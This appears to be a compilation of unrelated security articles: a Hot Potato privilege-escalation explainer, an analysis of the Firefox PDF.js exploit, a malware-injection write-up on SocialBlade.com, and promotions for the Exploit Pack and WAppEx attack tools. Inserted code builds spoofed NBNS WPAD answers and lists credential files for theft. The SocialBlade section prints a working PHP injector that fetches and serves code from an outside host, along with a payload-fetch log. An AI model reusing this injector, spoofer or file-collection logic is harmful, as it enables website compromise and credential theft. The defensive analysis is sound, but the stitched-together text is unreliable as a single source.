Another Door to Windows | Hot Potato exploit

Microsoft Windows 7, 8, 8.1, 10, Server 2008 and Server 2012 are vulnerable to the Hot Potato exploit, which lets an attacker with a low-privileged foothold take complete control of the machine

Security researchers from Foxglove Security have found that almost all recent versions of Microsoft's Windows operating system are vulnerable to a privilege escalation exploit. By chaining together a series of known Windows security flaws, the Foxglove researchers can elevate an ordinary user account to full SYSTEM control on Windows 7/8/8.1/10 and Windows Server 2008/2012.

The Foxglove researchers named the exploit Hot Potato. It relies on three different, long-known attacks, some of which date back to 2000. Chained together, they let an attacker who already has code execution as a low-privileged user on the machine escalate to NT AUTHORITY\SYSTEM. This is a local privilege escalation, not a remote break-in: the attacker has to be on the box first.

Surprisingly, some of the underlying issues were reported as far back as 2000 but have still not been patched by Microsoft, which has explained that fixing them would break compatibility between different versions of its operating system.

Hot Potato

Hot Potato is a combination of three separate weaknesses in Windows. The first is a local NBNS (NetBIOS Name Service) spoofing technique that is essentially 100% reliable: the attacker floods the machine's own NBNS port with forged positive answers covering every possible transaction ID, so any name the machine asks for resolves to the attacker's address. The second is WPAD (Web Proxy Auto-Discovery): once the name WPAD resolves to the attacker, the machine fetches the attacker's proxy configuration and routes its own HTTP traffic, including requests that Windows services make as SYSTEM, through the attacker. The third is an NTLM (NT LAN Manager) relay: the NTLM authentication carried in that HTTP traffic is relayed to the local SMB service, where it is accepted as a SYSTEM logon.

Exploiting these three issues as a chain lets the attacker elevate an application's permissions from the lowest rank to SYSTEM-level privileges, the Windows analogue of the root user on Linux/Android.
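To make the NBNS/WPAD step concrete, here is an added example (my own code, not Foxglove's proof of concept): it builds the broadcast name query a Windows host sends for WPAD, the forged positive answer a spoofer replies with (both in RFC 1002 wire format), parses both, and flags WPAD answers that do not come from the sanctioned WPAD host. The addresses, transaction IDs and the sanctioned-server address are assumptions. In Hot Potato the forged answers are sent to the victim's own NBNS port over loopback, so a network sensor only ever sees the victim's broadcast query; the same parser applied to a host-side capture of UDP/137 would see the flood of positive answers.

```python
"""NBNS (RFC 1002) name query / positive response codec and a WPAD-spoof check."""
import struct
from ipaddress import IPv4Address
from typing import Optional, Tuple

NB_TYPE = 0x0020         # NetBIOS general name service resource record
NB_CLASS = 0x0001        # Internet class
FLAGS_QUERY = 0x0110     # opcode QUERY, recursion desired, broadcast
FLAGS_RESPONSE = 0x8500  # response, authoritative answer, recursion desired


def encode_netbios_name(name: str, suffix: int = 0x00) -> bytes:
    """First-level encoding (RFC 1001 4.1): upper-case, space-pad to 15 bytes,
    append a one-byte suffix (0x00 = workstation service), then split every
    byte into two nibbles and add 'A' to each. Returned as one DNS-style label:
    length byte, 32 characters, root label."""
    raw = name.upper()[:15].ljust(15).encode("ascii") + bytes([suffix])
    label = b"".join(bytes([(b >> 4) + 0x41, (b & 0x0F) + 0x41]) for b in raw)
    return bytes([len(label)]) + label + b"\x00"


def decode_netbios_name(label: bytes) -> Tuple[str, int]:
    """Inverse of the encoding above for the bare 32-character label."""
    raw = bytes((((label[i] - 0x41) << 4) | (label[i + 1] - 0x41)) for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(" "), raw[15]


def build_query(trn_id: int, name: str) -> bytes:
    """The broadcast NAME QUERY REQUEST a Windows host sends when it resolves WPAD."""
    header = struct.pack(">HHHHHH", trn_id, FLAGS_QUERY, 1, 0, 0, 0)
    return header + encode_netbios_name(name) + struct.pack(">HH", NB_TYPE, NB_CLASS)


def build_positive_response(trn_id: int, name: str, addr: str, ttl: int = 300) -> bytes:
    """A POSITIVE NAME QUERY RESPONSE (RFC 1002 4.2.13). A spoofer emits one of
    these for every transaction id the victim might be using, pointing the name
    at its own address."""
    header = struct.pack(">HHHHHH", trn_id, FLAGS_RESPONSE, 0, 1, 0, 0)
    rdata = struct.pack(">H", 0x0000) + IPv4Address(addr).packed  # NB_FLAGS (B-node, unique) + NB_ADDRESS
    rr = encode_netbios_name(name) + struct.pack(">HHIH", NB_TYPE, NB_CLASS, ttl, len(rdata)) + rdata
    return header + rr


def parse_nbns(pkt: bytes) -> dict:
    """Decode the header, the first name and, for responses, the NB addresses."""
    trn_id, flags, _qdcount, ancount, _, _ = struct.unpack(">HHHHHH", pkt[:12])
    length = pkt[12]
    name, suffix = decode_netbios_name(pkt[13:13 + length])
    off = 13 + length + 1 + 4  # skip the root label and TYPE/CLASS
    info = {"trn_id": trn_id, "response": bool(flags & 0x8000),
            "name": name, "suffix": suffix, "addresses": []}
    if info["response"] and ancount:
        _ttl, rdlen = struct.unpack(">IH", pkt[off:off + 6])
        rdata = pkt[off + 6:off + 6 + rdlen]
        for i in range(0, rdlen, 6):  # each entry: NB_FLAGS (2) + NB_ADDRESS (4)
            info["addresses"].append(str(IPv4Address(rdata[i + 2:i + 6])))
    return info


def audit_nbns(pkt: bytes, src: str, expected_wpad: Optional[str] = None) -> Optional[str]:
    """Return a finding for WPAD-related traffic, None otherwise. A WPAD query
    reveals a host that will adopt whatever proxy answers first; a positive
    WPAD answer from anything but the sanctioned WPAD host (or any answer at
    all when no WPAD host is sanctioned) is the spoof."""
    info = parse_nbns(pkt)
    if info["name"] != "WPAD":
        return None
    if not info["response"]:
        return f"{src} is asking NBNS for WPAD (candidate victim)"
    if src != expected_wpad or any(a != expected_wpad for a in info["addresses"]):
        return f"spoofed WPAD answer from {src} -> {info['addresses']}"
    return None


if __name__ == "__main__":
    # Constructed exchange (addresses and ids are assumptions): a victim at
    # 10.0.0.5 asks for WPAD and a spoofer at 10.0.0.99 answers with itself.
    query = build_query(0x1234, "WPAD")
    answer = build_positive_response(0x1234, "WPAD", "10.0.0.99")
    print(encode_netbios_name("WPAD"))
    print(audit_nbns(query, "10.0.0.5"))
    print(audit_nbns(answer, "10.0.0.99", expected_wpad="10.0.0.2"))
```

encode_netbios_name("WPAD") yields the 32-character label FHFAEBEECACACACACACACACACACACAAA; that is the string to grep for in raw UDP/137 captures when hunting for WPAD lookups and the answers to them.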

The Foxglove researchers built their exploit on top of proof-of-concept code released by Google's Project Zero team in 2014 and presented their findings at the ShmooCon security conference over the past weekend.

They have also posted proof-of-concept videos on YouTube in which they break Windows 7, 8, 10, Server 2008 and Server 2012.

The proof-of-concept code is available on Foxglove's GitHub page.

Mitigation

The researchers note that enabling SMB signing (the "Microsoft network server: Digitally sign communications (always)" policy) should block the attack, since a relayed NTLM session cannot produce valid signatures. Another way to stop the NTLM relay is to enable Extended Protection for Authentication (EPA), which binds the NTLM exchange to the channel it was sent over. Both are configuration changes rather than patches, so administrators have to apply them themselves.


Credit:  Vijay Prabhu, techworm

Firefox Under Fire: Anatomy of latest 0-day attack

On August 6th, 2015, the Mozilla Foundation released a security update for the Firefox web browser that fixes CVE-2015-4495, a vulnerability in Firefox's embedded PDF viewer, PDF.js. The vulnerability allows an attacker to bypass the same-origin policy and run JavaScript in the local file context, which in turn lets the attacker read and write files on the local machine and upload them to a remote server. An exploit for this vulnerability is being actively used in the wild, so Firefox users are advised to update to the latest version (39.0.3 at the time of writing) immediately.

In this blog we provide an analysis of two versions of the script and share details about the associated attacks against Windows, Linux and OS X systems.

According to ESET's LiveGrid® telemetry, the server at the IP address 185.86.77.48, which was hosting the malicious script, has been up since July 27, 2015. Corroboration was also found on one of the compromised forums.

Operatives from the Department on Combating Cybercrime of the Ministry of Internal Affairs of Ukraine, who responded promptly to our notification, have also confirmed that the malicious exfiltration server, hosted in Ukraine, has been online since July 27, 2015.

According to our monitoring of the threat, the server became inactive on August 8, 2015.


The script

The script used is not obfuscated and easy to analyze. Nevertheless, the code shows that the attackers had good knowledge of Firefox internals.

The malicious script creates an IFRAME with an empty PDF blob. When Firefox is about to open the PDF blob with the internal PDF viewer (PDF.js), new code is injected into the IFRAME (Figure 2). When this code executes, a new sandboxContext property is created within wrappedJSObject and a JavaScript function is written to it; that function is invoked later by subsequent code. Together, these steps bypass the same-origin policy.

Code that creates sandboxContext property

The exploit is reliable and works smoothly. However, it may display a warning that can catch the attention of tech-savvy users.

The warning message shown on a compromised site

After successful exploitation of the bug, execution passes to the exfiltration part of the code. The script supports both Linux and Windows. On Windows it searches for configuration files belonging to popular FTP clients (such as FileZilla and SmartFTP), a Subversion (SVN) client, instant-messaging clients (Psi+ and Pidgin) and the Amazon S3 client.

The list of collected files on Windows at the first stage of attack

These configuration files may contain saved login and password details.

On Linux systems, the script sends the following files to the remote server:

  • /etc/passwd
  • /etc/hosts
  • /etc/hostname
  • /etc/issue

It also parses /etc/passwd in order to obtain the home directories of the users on the system. The script then searches those home directories for files by mask, skipping the home directories of standard system users (such as daemon, bin, sys, sync and so forth).

The list of collected files on Linux at stage 1 of attack

It collects and uploads such files as:

  • history (bash, MySQL, PostgreSQL)
  • SSH related configuration files and authorization keys
  • Configuration files for remote access software – Remmina
  • FileZilla configuration files
  • PSI+ configuration
  • text files with possible credentials and shell scripts

As is evident here, the purpose of the first version of the malicious script was to gather data used mostly by webmasters and site administrators. This allowed attackers to move on to compromising more websites.
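For incident responders scoping a Linux host that was hit, here is an added example (mine, not ESET's and not the attackers' code) that reproduces the collector's selection logic from the description above: it parses /etc/passwd for real users' home directories, skips the standard system accounts, and reports which of the files present on the host fall into the categories the script collects. The set of skipped accounts beyond the four the post names, the no-login-shell heuristic, the file masks, and the sample passwd and path list are all assumptions of mine; the real mask list was only shown as a screenshot.

```python
"""Which files on a Linux host the stage-1 collector would have uploaded."""
import fnmatch
import os
from typing import Dict, Iterable, List

# Files the post names explicitly.
SYSTEM_FILES = ["/etc/passwd", "/etc/hosts", "/etc/hostname", "/etc/issue"]

# Accounts whose home directories are skipped. The post names daemon, bin,
# sys and sync "and so forth"; the remainder of this set is an assumption.
SYSTEM_USERS = {"daemon", "bin", "sys", "sync", "games", "man", "lp", "mail",
                "news", "uucp", "proxy", "www-data", "backup", "list", "irc",
                "gnats", "nobody"}

# Per-home masks approximating the categories the post lists (the exact mask
# list was a screenshot). Paths are relative to the home directory.
HOME_MASKS = [
    ".bash_history", ".mysql_history", ".psql_history",  # shell and DB client history
    ".ssh/*",                                            # config, private keys, authorized_keys
    ".remmina/*", ".config/remmina/*",                   # Remmina remote-access profiles
    ".filezilla/*.xml",                                  # FileZilla sitemanager / recentservers
    ".config/psi+/*",                                    # Psi+ account data
    "*pass*", "*.sh",                                    # "possible credentials" text files, shell scripts
]


def parse_home_dirs(passwd_text: str) -> Dict[str, str]:
    """Map real users to their home directories, skipping the standard system
    accounts and (my heuristic) any account without a login shell."""
    homes: Dict[str, str] = {}
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) < 7 or line.startswith("#"):
            continue
        user, home, shell = fields[0], fields[5], fields[6]
        if user in SYSTEM_USERS or shell.endswith(("nologin", "false")):
            continue
        homes[user] = home
    return homes


def exposed_files(passwd_text: str, existing_paths: Iterable[str]) -> List[str]:
    """Return the subset of existing_paths that match the collector's targets."""
    paths = set(existing_paths)
    hits = {p for p in SYSTEM_FILES if p in paths}
    for home in parse_home_dirs(passwd_text).values():
        prefix = home.rstrip("/") + "/"
        for path in paths:
            if not path.startswith(prefix):
                continue
            rel = path[len(prefix):]
            if any(fnmatch.fnmatchcase(rel, mask) for mask in HOME_MASKS):
                hits.add(path)
    return sorted(hits)


def audit_live_host() -> List[str]:
    """Run the same check against the real /etc/passwd and home directories."""
    with open("/etc/passwd", encoding="utf-8", errors="replace") as fh:
        passwd_text = fh.read()
    found = [p for p in SYSTEM_FILES if os.path.exists(p)]
    for home in parse_home_dirs(passwd_text).values():
        for root, _dirs, files in os.walk(home):
            found.extend(os.path.join(root, f) for f in files)
    return exposed_files(passwd_text, found)


# Constructed sample data standing in for a real host.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
deploy:x:1001:1001::/home/deploy:/bin/sh
"""
SAMPLE_PATHS = [
    "/etc/passwd", "/etc/hosts", "/etc/hostname", "/etc/issue", "/etc/shadow",
    "/root/.bash_history", "/root/.ssh/id_rsa",
    "/home/alice/.bash_history", "/home/alice/.ssh/config",
    "/home/alice/.filezilla/sitemanager.xml", "/home/alice/passwords.txt",
    "/home/alice/deploy.sh", "/home/alice/notes.txt",
    "/home/deploy/.mysql_history", "/home/deploy/Documents/report.pdf",
    "/var/www/.ssh/id_rsa",
]

if __name__ == "__main__":
    for path in exposed_files(SAMPLE_PASSWD, SAMPLE_PATHS):
        print("would have been uploaded:", path)
```

Note that /etc/shadow is not on the list (the script ran as the browser's user and never needed it) and that www-data's key under /var/www is skipped because the collector ignores system accounts, so a web server's deploy key could survive even though the user's own did not.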


The second version

The day after Mozilla released the patch for Firefox the attackers decided to go “all-in”: they registered two new domains and improved their script.

The two new malicious domains were maxcdnn[.]com (93.115.38.136) and acintcdn[.]net (185.86.77.48). The second IP address is the same one as used in the first version. Attackers selected these names because the domains look as if they belong to a content delivery network (CDN).

The improved script on the Windows platform not only collects configuration files for applications; it also collects text files containing almost all combinations of words of possible value to attackers (such as password, accounts, bitcoins, credit cards, exploits, certificates, and so on):

List of files collected on Windows during the second attack stage

The attackers improved the Linux script by adding new files to collect and also developed code that works on the Mac OS X operating system:

List of files collected on Macs during the second stage of an attack

Some Russian-speaking commentators misattributed this code to the Duqu malware, because some variables in the code have the text “dq” in them.


A copycat attack

Since the bug is easy to exploit and a working copy of the script is available to cybercriminals, different attackers have started to use it. We have seen various groups quickly adopt the exploit and start serving it, mostly on adult sites, from google-user-cache[.]com (108.61.205.41).

This malicious script does all the same things as the original script, but it collects different files:

The list of collected files used in copycat attack


Conclusion

The recent Firefox attacks are an example of active in-the-wild exploitation of a serious software vulnerability. The exploit shows that the malware-writers had a deep knowledge of Firefox internals. It is also an interesting one, since in most cases, exploits are used as an infection vector for other data-stealing trojans. In this instance, however, that was not necessary, because the malicious script alone was able to steal sensitive files from victims’ systems.

Additionally, the exploit started to be reused by other malware operators shortly after its discovery. This is common practice in the malware world.

ESET detects the malicious scripts as JS/Exploit.CVE-2015-4495. We also urge Firefox users to update their browser to the patched version (39.0.3). The internal Firefox PDF reader can also be disabled by changing the pdfjs.disabled setting to true.


Indicators of Compromise

A partial list of compromised servers:

hxxp://www.akipress.org/

hxxp://www.tazabek.kg/

hxxp://www.super.kg/

hxxp://www.rusmmg.ru/

hxxp://forum.cs-cart.com/

hxxp://www.searchengines.ru/

hxxp://forum.nag.ru/

Servers used in attack:

maxcdnn[.]com (93.115.38.136)

acintcdn[.]net (185.86.77.48)

google-user-cache[.]com (108.61.205.41)

Hashes (SHA-1):

0A19CC67A471A352D76ACDA6327BC179547A7A25

2B1A220D523E46335823E7274093B5D44F262049

19BA06ADF175E2798F17A57FD38A855C83AAE03B

3EC8733AB8EAAEBD01E5379936F7181BCE4886B3


Credit:  Anton Cherepanov

Exploit Pack – Open Source Security Project for Penetration Testing and Exploit Development


Exploit Pack is an open source security tool licensed under the GPLv3, which means it is fully free and you can use it without restriction. Commercial tools such as Metasploit (in its paid edition), Immunity Canvas or Core Impact are ready to use as well, but you need an expensive license to get all of their features, for example automatic exploit launching, full reporting and reverse shell agent customisation.


Exploit Pack is fully free, open source and GPLv3-licensed. Because it is an open source project you can modify it, add or replace features and get involved in the next project decisions; everyone is welcome to participate. We developed this tool by pentesters, for pentesters: as security professionals we use Exploit Pack on a daily basis to run real-environment attacks against real corporate clients.


Video demonstration of the latest Exploit Pack release:


More than 300 exploits
A professional-grade security tool
Exploit Pack comes into play when you need to execute a pentest in a real environment; it provides the tools needed to gain access and to persist through remote reverse agents.


Remote persistent agents
Get a reverse shell and escalate privileges
Exploit Pack provides a complete set of features for creating your own custom agents; you can include exploits or deploy your own personalised shellcode directly into the agent.


Write your own exploits
Use Exploit Pack as a learning platform
Quick exploit development: extend your capabilities and code your own custom exploits using the Exploit Wizard and the built-in Python editor, adapted to the needs of an exploit writer.



SocialBlade.com compromised, starts redirection chain to Nuclear Pack exploit kit

Update (07/29/2014): Following our notification, the developers in charge of SocialBlade.com have investigated and identified the source of the compromise. The site has been cleaned up of the malware and so far our systems have not detected anymore traces of suspicious activity. We will monitor the site for the next few days and update if required.

Update 2 (07/29/2014): The SocialBlade developers were kind enough to provide us with technical server-side details of the attack. We share them below, in the server-side section, to help the many other affected site owners quickly identify and address this type of compromise.

Last week, we wrote about the compromise on AskMen.com that was leading unsuspecting visitors to the Nuclear Pack exploit kit and infecting computers that were vulnerable.

In what appears to be a similar campaign, the YouTube stats tracker site SocialBlade.com is connected with malicious re-directions that also lead to the Nuclear Pack EK.

“Social Blade is a statistics driven website where you can track your Youtube progress and compare to other big youtubers to see how you are doing.”


The drive-by download which was detected by our honeypots is successfully blocked by Malwarebytes Anti-Exploit.

According to site tracker SimilarWeb, SocialBlade.com has a global rank of 5,791 and had around 3.6 million visits last month.


Technical details

Traffic flow:

hxxp://socialblade.com/youtube/user/Goleyjoygame
hxxp://socialblade.com/js/jquery.js
hxxp://static.the-button.com/d2.php?ds=true&dr=1447532217
hxxp://static.pointweb.ca/pop2.php?acc=sbc%0E%97%B0%FA%DD%92%05%CAF%F8%8E%8A%D1rd+%DD%BE%89%DD%AE&nrk=6160647100
hxxp://e3dd7df0d05y.correctzoom.uni.me/
hxxp://50d88d1ad05y.correctzoom.uni.me/1406197380.swf
hxxp://50d88d1ad05y.correctzoom.uni.me/f/1406197380/7
hxxp://50d88d1ad05y.correctzoom.uni.me/1406197380.pdf
hxxp://50d88d1ad05y.correctzoom.uni.me/1406197380.htm
hxxp://50d88d1ad05y.correctzoom.uni.me/f/1406197380/5/x00520804090407000700080150050f0304045106565601;1;5
hxxp://50d88d1ad05y.correctzoom.uni.me/1406197380.jar

Website compromise:

Pinpointing exactly where the infection started was a little more complex than usual. Typically we’d see an iframe and we would be able to search for it by its string. This was not the case here, so we had to manually inspect each web session and external references.

The intruder was in a core JavaScript file: hxxp://socialblade.com/js/jquery.js


Very often, rogue code is appended to the end of an existing library or plugin file, where it is not easy to spot and is not necessarily flagged as bad by scanners. What gave it away was fetching the original (unaltered) version of jquery.js and comparing the two: the extra code at the end became obvious, and it had probably been injected by a backdoor residing on the web server itself.

Update: Server side details

Server logs (wget output recorded on the server, showing a payload being fetched from sux.pw):

--2014-07-28 18:27:18--  http://sux.pw/p/?type=raw&id=9dc0840c
Resolving sux.pw (sux.pw)...

Cross-site contamination:

The culprit: settings2.php

<?php
// Pulled into every PHP page through the .htaccess auto_append_file directive.
// The "pcid" session flag makes sure each visitor is served the injection once.
if (!isset($_SESSION)) session_start();
if (!isset($_SESSION["pcid"]))
{
 $imptt_agent = getenv('HTTP_USER_AGENT');
 // Only Internet Explorer on Windows is targeted (MSIE token, or Trident for IE11).
 if(stristr($imptt_agent, 'Windows NT')&&(stristr($imptt_agent, 'MSIE')||stristr($imptt_agent, 'Trident')))
 {
 // Visitor address as an unsigned 32-bit integer (ip2long is signed on 32-bit PHP).
 $imptt_ip = ip2long($_SERVER['REMOTE_ADDR']);
 if($imptt_ip<0) $imptt_ip += 4294967296;
 // Fetch the injection from the first redirector, reporting the visitor's
 // IP and User-Agent so the gate can fingerprint the victim and serve each
 // address only once.
 $imptt_fp = fsockopen("static.the-button.com", 80);
 if ($imptt_fp)
 {
 fputs($imptt_fp,"GET /d2.php?dr=".rand(100000000,9999999999)."&di=".$imptt_ip."&du=".urlencode($imptt_agent)." HTTP/1.0\n\n");
 // Keep only the last line of the reply: the base64-encoded code to print into the page.
 while(!feof($imptt_fp)) $imptt_pt=fgets($imptt_fp,4096);
 print (base64_decode($imptt_pt));
 fclose($imptt_fp);
 $_SESSION['pcid'] = $imptt_ip;
 }
 }
}
?>

Infected .htaccess file:

The cause: a world-writable (777) .htaccess file carried a php_value auto_append_file directive pointing at settings2.php, so PHP appended that script's output to every PHP page the site rendered, which is how the malicious code reached each page:

php_value auto_append_file "/var/www/blog/wp-admin/network/settings2.php"

Note: the actual directory path has been ‘anonymized’ as to not reveal SocialBlade’s infrastructure.
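An added example (not SocialBlade's or Malwarebytes' code) of the two checks that would have caught this compromise: scan .htaccess files for auto_append_file / auto_prepend_file directives and world-writable permissions, and compare a served asset with its pristine copy so that appended code stands out, as it did for jquery.js here. The sample .htaccess, the stand-in jquery.js bytes and the appended snippet are constructed; only the directive and the anonymised path come from the post.

```python
"""Hunt for the two artefacts described above: a php_value auto_*_file
directive in .htaccess and code appended to a known static asset."""
import hashlib
import os
import re
import stat
from typing import List, Optional, Tuple

# php_value / php_admin_value / php_flag followed by auto_append_file or
# auto_prepend_file; either directive makes PHP run an extra file on every request.
INJECT_DIRECTIVE = re.compile(
    r"^\s*php_(?:admin_)?(?:value|flag)\s+(auto_(?:append|prepend)_file)\s+\"?([^\"\s]+)\"?",
    re.IGNORECASE | re.MULTILINE,
)


def find_injected_includes(htaccess_text: str) -> List[Tuple[str, str]]:
    """Return (directive, path) for every auto_*_file directive found."""
    return [(m.group(1).lower(), m.group(2)) for m in INJECT_DIRECTIVE.finditer(htaccess_text)]


def is_world_writable(mode: int) -> bool:
    """True for the 777-style permission the compromised .htaccess had."""
    return bool(mode & stat.S_IWOTH)


def appended_tail(served: bytes, pristine: bytes) -> Optional[bytes]:
    """If the served file is the pristine one with something appended, return
    the appended part (b"" when identical); None if it differs elsewhere."""
    if not served.startswith(pristine):
        return None
    return served[len(pristine):]


def sha256_matches(content: bytes, known_hex: str) -> bool:
    """Cheap integrity check against a hash taken from the vendor's release."""
    return hashlib.sha256(content).hexdigest() == known_hex.lower()


def scan_docroot(root: str) -> List[str]:
    """Walk a document root and report .htaccess files that carry an
    auto_*_file directive or are world-writable."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" not in files:
            continue
        path = os.path.join(dirpath, ".htaccess")
        mode = os.stat(path).st_mode
        with open(path, encoding="utf-8", errors="replace") as fh:
            for directive, target in find_injected_includes(fh.read()):
                findings.append(f"{path}: {directive} -> {target}")
        if is_world_writable(mode):
            findings.append(f"{path}: world-writable")
    return findings


# Constructed samples (the directive and its path are the anonymised ones
# quoted in the post; everything else is made up for the demonstration).
SAMPLE_HTACCESS = """\
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule ^index\\.php$ - [L]
</IfModule>
php_value auto_append_file "/var/www/blog/wp-admin/network/settings2.php"
"""
PRISTINE_JS = b"/* constructed stand-in for a pristine jquery.js */\nfunction jq(){}\n"
INJECTED_JS = b'var s="\\u0068\\u0074\\u0074\\u0070";document.write(s);\n'
SERVED_JS = PRISTINE_JS + INJECTED_JS
PRISTINE_SHA256 = hashlib.sha256(PRISTINE_JS).hexdigest()

if __name__ == "__main__":
    print(find_injected_includes(SAMPLE_HTACCESS))
    print(is_world_writable(0o100777), is_world_writable(0o100644))
    print(appended_tail(SERVED_JS, PRISTINE_JS))
    print(sha256_matches(SERVED_JS, PRISTINE_SHA256))
```

The hash check tells you a file changed; the prefix comparison tells you what was added, which is what you want to paste into the analysis that follows. Run scan_docroot against the site's document root to find every .htaccess that pulls in an extra PHP file.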

JavaScript code analysis

Now let's get back to the JavaScript code served to visitors. The following variable (s) is built from Unicode escape sequences, a technique often used to hide obvious strings from the human eye.

Translating the escapes back to characters reveals the URL (static.the-button.com/d2.php?) that is loaded in an iframe. the-button.com looks like a compromised site (too bad for fans of the TV series Lost; go there at your own risk!).


The rest of the JavaScript code writes the iframe and launches the redirection workflow. To see how it progresses we use Google Chrome's JavaScript console.

Because the code only fires if the user is running Internet Explorer or Firefox, we comment out the condition so it always executes, even in Chrome.

The Network tab then shows what happens when that JavaScript is loaded: a first request to d2.php, followed by pop2.php. Note that this redirection only happens once per IP address.

Redirector #1:
hxxp://static.the-button.com/d2.php?ds=true&dr=1447532217


Source code: the page returned by d2.php creates an iframe pointing to a second redirector.

Redirector #2:
hxxp://static.pointweb.ca/pop2.php?acc=sbc%0E%97%B0%FA%DD%92%05%CAF%F8%8E%8A%D1rd+%DD%BE%89%DD%AE&nrk=6160647100


Now we have the final redirection to the exploit kit landing page (note the code obfuscation and the use of rot13 to mask the URL).
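An added example (mine, not the redirector's code) that unmasks both obfuscation tricks mentioned above: the \uXXXX-escaped string hiding the d2.php URL in the injected jquery.js, and the rot13-encoded landing-page URL in pop2.php. The two JavaScript snippets are constructed stand-ins built around the URLs the post recovered, not the actual injected code; the escape decoder and the rot13 pass are generic and work on other scripts that use the same tricks.

```python
"""Unmask \\uXXXX-escaped string literals and rot13-encoded URLs in JavaScript."""
import codecs
import re
from typing import List

JS_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})")
URL = re.compile(r"""https?://[A-Za-z0-9.-]+(?:/[^\s"'<>]*)?""")


def decode_js_escapes(js: str) -> str:
    """Replace \\uXXXX and \\xXX escapes with the characters they denote."""
    return JS_ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), js)


def rot13(text: str) -> str:
    """rot13 is its own inverse, so one pass both masks and unmasks."""
    return codecs.decode(text, "rot_13")


def extract_urls(text: str) -> List[str]:
    return URL.findall(text)


def deobfuscate(js: str) -> List[str]:
    """URLs visible after escape decoding, plus those that only appear once the
    script is viewed through rot13. Order preserved, duplicates removed."""
    plain = decode_js_escapes(js)
    found: List[str] = []
    for view in (plain, rot13(plain)):
        for url in extract_urls(view):
            if url not in found:
                found.append(url)
    return found


# Constructed stand-ins for the two stages (not the actual injected code).
# Stage 1: the URL the post recovered, as a \u-escaped literal written into an iframe.
STAGE1_JS = (
    'var s="' + "".join("\\u%04x" % ord(c) for c in "http://static.the-button.com/d2.php?") + '";'
    "document.write('<iframe src=\"'+s+'ds=true\" width=\"1\" height=\"1\"></iframe>');"
)
# Stage 2: the landing-page URL rot13'd and unmasked by the usual one-liner.
STAGE2_JS = (
    'var u="uggc://r3qq7qs0q05l.pbeerpgmbbz.hav.zr/";'
    'u=u.replace(/[a-zA-Z]/g,function(c){return String.fromCharCode('
    '(c<="Z"?90:122)>=(c=c.charCodeAt(0)+13)?c:c-26);});'
)

if __name__ == "__main__":
    for url in deobfuscate(STAGE1_JS + "\n" + STAGE2_JS):
        print(url)
```

Running it on both stages prints the d2.php redirector and the correctzoom.uni.me landing page; the same two-view trick (plain and rot13) is cheap enough to run over every script a crawler fetches.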

Nuclear Pack EK landing page:
hxxp://e3dd7df0d05y.correctzoom.uni.me/


Flash exploit (CVE-2014-0515?):
hxxp://50d88d1ad05y.correctzoom.uni.me/1406197380.swf
VT (5/53) link


PDF exploit (CVE-2010-0188 see this detailed blog post by Quequero):
hxxp://50d88d1ad05y.correctzoom.uni.me/1406197380.pdf
VT (4/52) link


Java exploit (CVE-2013-2465?):
hxxp://50d88d1ad05y.correctzoom.uni.me/1406197380.jar
VT (4/52) link


Internet Explorer exploit (CVE ?):
hxxp://50d88d1ad05y.correctzoom.uni.me/1406197380.htm
VT (0/53) link


Payload:
hxxp://50d88d1ad05y.correctzoom.uni.me/f/1406197380/7
VT (17/52) link

Malwarebytes Anti-Malware detects this as Trojan.Agent.ED.

This downloader talks back to: icepower.su/b/shoe/75412 and then attempts to download a file from smokejuse.su/mod_articles9874.564/jquery/. This most likely leads to ad-fraud related malware (clickjacking etc.).

We have notified the owners of SocialBlade.com so they can fix the issue ASAP and prevent unnecessary malware infections.

As always, please make sure your computer is up-to-date (especially the browser and its plugins) and that you have real-time Antivirus/Anti-Malware protection. To be even one step ahead of the bad guys, feel free to consider Anti-Exploit mitigation tools that proactively detect and block malicious code behavior.


CREDIT: Jérôme Segura – Malwarebytes

WAppEx v2.0 : Web Application exploitation Tool

WAppEx is an integrated web application security assessment and exploitation platform designed with the whole spectrum of users in mind, from security professionals to web application hobbyists. It proposes a security assessment model that revolves around an extensible exploit database and complements it with the tools required to perform all stages of a web application attack.

Updates in 2.0:

  • Auto-detect feature deleted from exploits
  • Browser tool deleted
  • Exploits and payloads view changed
  • Exploit Database with the following features added:
    • New script syntax and structure
    • Searching, selecting, and executing of exploits.
    • Add/remove database entries (exploits or payloads)
    • Add exploits or payloads to the database using either the Exploit Wizard or the script file
    • Batch testing of multiple targets against multiple exploits
    • Execute multiple instances of one or more payloads (for every running exploit) simultaneously.
  • Following tools added:
    • Manual Request
    • Dork Finder
    • Exploit Editor
    • Hidden File Checker
    • Neighbor Site Finder
  • Local File Inclusion analyzer script updated
  • 24 new payloads for LFI, RFI, and PHP Code Execution vulnerabilities added:
    • Directory Explorer
    • CodeExec Bind
    • 3 connect-back shells
    • Code Execution
    • MySQL Dump
    • ServerInfo
    • 4 command execution payloads
  • Bug-fixes:
    • Find Login Page crashed on start
    • Problem with software registration
    • Stop button did not work when retrieving data from SQL server
    • Problem with saving SQL results
    • Crashed when closing Find Login Page
    • Status icons were not displayed properly in exploit tabs
The full list of features is as follows:
  • An exploit database covering a wide range of vulnerabilities.
  • A set of tools useful for penetration testing:
    • Manual Request
    • Dork Finder
    • Exploit Editor
    • Hidden File Checker
    • Neighbor Site Finder
    • Find Login Page
    • Online Hash Cracker
    • Encoder/Decoder
  • Execute multiple instances of one or more exploits simultaneously.
  • Execute multiple instances of one or more payloads (for every running exploit) simultaneously.
  • Test a list of target URLs against a number of selected exploits.
  • Allows you to create your own exploits and payloads and share them online.
  • A number of featured exploits (6) and payloads (39) bundled within the software exploit database:
    • Testing and exploiting of Local File Inclusion vulnerabilities
    • Testing and exploiting of Local File Disclosure vulnerabilities
    • Testing and exploiting of Remote File Inclusion vulnerabilities
    • Testing and exploiting of SQL Injection vulnerabilities
    • Testing and exploiting of Remote Command Execution vulnerabilities
